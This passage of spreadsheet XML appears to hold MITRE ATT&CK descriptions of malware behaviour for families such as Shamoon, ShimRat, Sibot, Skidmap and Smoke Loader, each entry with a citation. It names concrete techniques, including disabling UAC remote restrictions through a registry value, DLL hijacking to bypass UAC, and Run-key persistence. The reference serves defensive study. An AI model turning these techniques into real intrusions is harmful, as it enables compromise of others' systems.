    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has used FTP for C2 communications.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has deleted arbitrary Registry values.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has downloaded code from a C2 server.(Citation: Securelist ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) maintains a configuration block and virtual file system in the Registry.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has used UDP for C2 communications.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has encoded data as readable Latin characters.(Citation: Securelist ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has encrypted a virtual file system and various files.(Citation: Securelist ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has collected the PID of a malicious process.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has injected an install module into a newly created process.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has sent data back to C2 every 8 hours.(Citation: Securelist ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has discovered system information including memory status, CPU frequency, OS versions, and volume serial numbers.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has collected the domain name of the victim system.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has collected the username of the victim system.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has collected the current date and time of the victim system.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) communicates over HTTP to retrieve a string that is decoded into a C2 server URL.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) attempts to disable UAC remote restrictions by modifying the Registry.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) attempts to overwrite operating system files and disk structures with image files.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016) In a later variant, randomly generated data was used for data overwrites.(Citation: Unit 42 Shamoon3 2018)(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) has an operational mode for encrypting data instead of overwriting it.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) decrypts ciphertext using an XOR cipher and a base64-encoded string.(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) has been seen overwriting features of disk structure such as the MBR.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>If [Shamoon](https://attack.mitre.org/software/S0140) cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion.(Citation: FireEye Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) can download an executable to run on the victim.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) attempts to copy itself to remote machines on the network.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named “ntssrv” that attempts to appear legitimate; the service's display name is “Microsoft Network Realtime Inspection Service” and its description is “Helps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.” Newer versions create the "MaintenaceSrv" service, which misspells the word "maintenance."(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>Once [Shamoon](https://attack.mitre.org/software/S0140) has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting &lt;code&gt;SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy&lt;/code&gt; to 1.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) contains base64-encoded strings.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) queries several Registry keys to identify hard disk partitions to overwrite.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) scans the C-class subnet of the IPs on the victim's interfaces.(Citation: FireEye Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) accesses network share(s), enables share access to the target device, copies an executable payload to the target system, and uses a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) to execute the malware.(Citation: FireEye Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) copies an executable payload to the target system by using [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) and then scheduling an unnamed task to execute the malware.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named “ntssrv” to execute the payload. [Shamoon](https://attack.mitre.org/software/S0140) can also spread via [PsExec](https://attack.mitre.org/software/S0029).(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December19 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) obtains the victim's operating system version and keyboard layout and sends the information to the C2 server.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) obtains the target's IP address and local network segment.(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) will reboot the infected system once the wiping functionality has been completed.(Citation: Unit 42 Shamoon3 2018)(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) obtains the system time and will only activate if it is greater than a preset date.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) can change the modified time for files to evade forensic detection.(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) can impersonate tokens using &lt;code&gt;LogonUser&lt;/code&gt;, &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;, and &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt;.(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) has used HTTP for C2.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named “ntssrv” to execute the payload. Newer versions create the "MaintenaceSrv" and "hdv_725x" services.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) has decompressed data received from the C2 server.(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) has the ability to download and execute additional payloads via a DropBox API.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) can execute arbitrary commands with PowerShell.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SharpStage](https://attack.mitre.org/software/S0546) has the ability to create persistence for the malware using the Registry autorun key and startup folder.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[SharpStage](https://attack.mitre.org/software/S0546) has a persistence component to write a scheduled task for the payload.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) has the ability to capture the victim's screen.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) has checked the system settings to see if Arabic is the configured language.(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SharpStage](https://attack.mitre.org/software/S0546) has used a legitimate web service for evading detection.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) can execute arbitrary commands with the command line.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) can use WMI for execution.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has installed shim databases in the &lt;code&gt;AppPatch&lt;/code&gt; folder.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has hijacked the cryptbase.dll within migwiz.exe to escalate privileges. This prevented the User Access Control window from appearing.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has the capability to upload collected files to a C2.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has decompressed its core DLL using shellcode once an impersonated antivirus component was running on a system.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can use pre-configured HTTP proxies.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has used a secondary C2 location if the first was unavailable.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can uninstall itself from compromised hosts, as well create and modify directories, delete, move, copy, and rename files.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can list directories.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can hijack the cryptbase.dll within migwiz.exe to escalate privileges and bypass UAC controls.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can download additional files.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can impersonate Windows services and antivirus products to avoid detection on compromised systems.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has registered two registry keys for shim databases.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has used Windows API functions to install the service and shim.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can enumerate connected drives for infected host machines.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has been delivered as a package that includes compressed DLL and shellcode payloads within a .dat file.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has installed a registry based start-up key &lt;code&gt;HKCU\Software\microsoft\windows\CurrentVersion\Run&lt;/code&gt; to maintain persistence should other methods fail.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can sleep when instructed to do so by the C2.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444)'s loader has been packed with the compressed [ShimRat](https://attack.mitre.org/software/S0444) core DLL and the legitimate DLL for it to hijack.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) communicated over HTTP and HTTPS with C2 servers.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can be issued a command shell function from the C2.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has installed a Windows service to maintain persistence on victim machines.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) listed all non-privileged and privileged accounts available on the machine.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) used LZ compression to compress initial reconnaissance reports before sending to the C2.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered information automatically, without instruction from a C2, related to the user and host machine that is compiled into a report and sent to the operators.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) sent collected system and network information compiled into a report to an adversary-controlled C2.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) sent generated reports to the C2 via HTTP POST requests.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) had the ability to download additional payloads.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) spoofed itself as &lt;code&gt;AlphaZawgyl_font.exe&lt;/code&gt;, a specialized Unicode font.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) used several Windows API functions to gather information from the infected system.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) encrypted gathered information with a combination of shifting and XOR using a static key.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the local privileges for the infected host.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) listed all running processes on the machine.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered a list of installed software on the infected host.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the operating system name and specific Windows version of an infected machine.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the local proxy, domain, IP, routing tables, mac address, gateway, DNS servers, and DHCP status information from an infected host.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) used the Windows function &lt;code&gt;GetExtendedUdpTable&lt;/code&gt; to detect connected UDP endpoints.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) communicated over HTTP with preconfigured C2 servers.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) can decrypt data received from a C2 and save to a file.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) will delete itself if a certain server response is received.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) will delete an associated registry key if a certain server response is received.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) can download and execute a payload onto a compromised system.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has downloaded a DLL to the &lt;code&gt;C:\windows\system32\drivers\&lt;/code&gt; folder and renamed it with a &lt;code&gt;.sys&lt;/code&gt; extension.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has installed a second-stage script in the &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot&lt;/code&gt; registry key.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has been executed via MSHTA application.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has obfuscated scripts used in execution.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has queried the registry for proxy server information.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has executed downloaded DLLs with &lt;code&gt;rundll32.exe&lt;/code&gt;.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has been executed via a scheduled task.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) checked if the compromised system is configured to use proxies.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has retrieved a GUID associated with a present LAN connection on a compromised machine.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) executes commands using VBScript.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) communicated with its C2 server via HTTP GET requests.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has used a legitimate compromised website to download DLLs to the victim's machine.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has used WMI to discover network connections and configurations. [Sibot](https://attack.mitre.org/software/S0589) has also used the Win32_Process class to execute a malicious DLL.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>Domain Controller Authentication</t>
  </si>
  <si>
    <t>[Skeleton Key](https://attack.mitre.org/software/S0007) is used to patch an enterprise domain controller authentication process with a backdoor password. It allows adversaries to bypass the standard authentication system to use a defined password for all accounts authenticating to that domain controller.(Citation: Dell Skeleton)</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has installed itself via crontab.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has the ability to download, unpack, and decrypt tar.gz files .(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to set SELinux to permissive mode.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has checked for the existence of specific files including &lt;code&gt;/usr/sbin/setenforce&lt;/code&gt; and &lt;code&gt; /etc/selinux/config&lt;/code&gt;. It also has the ability to monitor the cryptocurrency miner file and process. (Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has the ability to download files on an infected host.(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to install several loadable kernel modules (LKMs) on infected machines.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has created a fake &lt;code&gt;rm&lt;/code&gt; binary to replace the legitimate Linux binary.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has encrypted it's main payload using 3DES.(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has monitored critical processes to ensure resiliency.(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit that has the ability to hook system calls to hide specific files and fake network and CPU-related statistics to make the CPU load of the infected machine always appear low.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to add the public key of its handlers to the &lt;code&gt;authorized_keys&lt;/code&gt; file to maintain persistence on an infected host.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has the ability to check if &lt;code&gt;/usr/sbin/setenforce&lt;/code&gt; exists. This file controls what mode SELinux is in.(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to check whether the infected system’s OS is Debian or RHEL/CentOS to determine which cryptocurrency miner it should use.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has used &lt;code&gt;pm.sh&lt;/code&gt; to download and install its main payload.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) searches for files named logins.json to parse for credentials.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) searches for credentials stored from web browsers.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) deobfuscates its code.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) recursively searches through directories for files.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) downloads a new version of itself once it has installed. It also downloads additional plugins.(Citation: Malwarebytes SmokeLoader 2016)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.).(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) uses a simple one-byte XOR method to obfuscate values in the malware.(Citation: Malwarebytes SmokeLoader 2016)(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) spawns a new copy of c:\windows\syswow64\explorer.exe and then replaces the executable code in memory with malware.(Citation: Malwarebytes SmokeLoader 2016)(Citation: Microsoft Dofoil 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) injects into the Internet Explorer process.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) adds a Registry Run key for persistence and adds a script in the Startup folder to deploy the payload.(Citation: Malwarebytes SmokeLoader 2016)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) launches a scheduled task.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) scans processes to perform anti-VM checks. (Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) adds a Visual Basic script in the Startup folder to deploy the payload.(Citation: Malwarebytes SmokeLoader 2016)</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) uses HTTP for C2.(Citation: Malwarebytes SmokeLoader 2016)</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) creates a suspended svchost process and injects its DLL into it.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) can write and execute PowerShell scripts.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) can list all running processes.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) can start SOCKS proxy threads.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) can take screenshots.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can decode and decrypt exfiltrated data sent to C2.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can enumerate domain accounts via &lt;code&gt;net.exe user /domain&lt;/code&gt;.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can enumerate domain groups by executing &lt;code&gt;net.exe group /domain&lt;/code&gt;.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can gain access by exploiting a Sangfor SSL VPN vulnerability that allows for the placement and delivery of malicious update binaries.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) has the ability to list directories.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can download additional payloads from C2.(Citation: CISA SoreFang July 2016)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can collect usernames from the local system via &lt;code&gt;net.exe user&lt;/code&gt;.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) has the ability to encode and RC6 encrypt data sent to C2.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can enumerate processes on a victim machine through use of [Tasklist](https://attack.mitre.org/software/S0057).(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can gain persistence through use of scheduled tasks.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can collect the hostname, operating system configuration, product ID, and disk space on victim machines by executing [Systeminfo](https://attack.mitre.org/software/S0096).(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can collect the TCP/IP, DNS, DHCP, and network adapter configuration on a compromised host via &lt;code&gt;ipconfig.exe /all&lt;/code&gt;.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can use HTTP in C2 communications.(Citation: CISA SoreFang July 2016)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has used a custom XOR algorithm to decrypt the payload.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has exfiltrated data over the C2 channel.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has been packed with Enigma Protector to obfuscate its contents.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has encoded communications with the C2 server with base64.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) can collect the hostname, keyboard layout, and language from the system.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
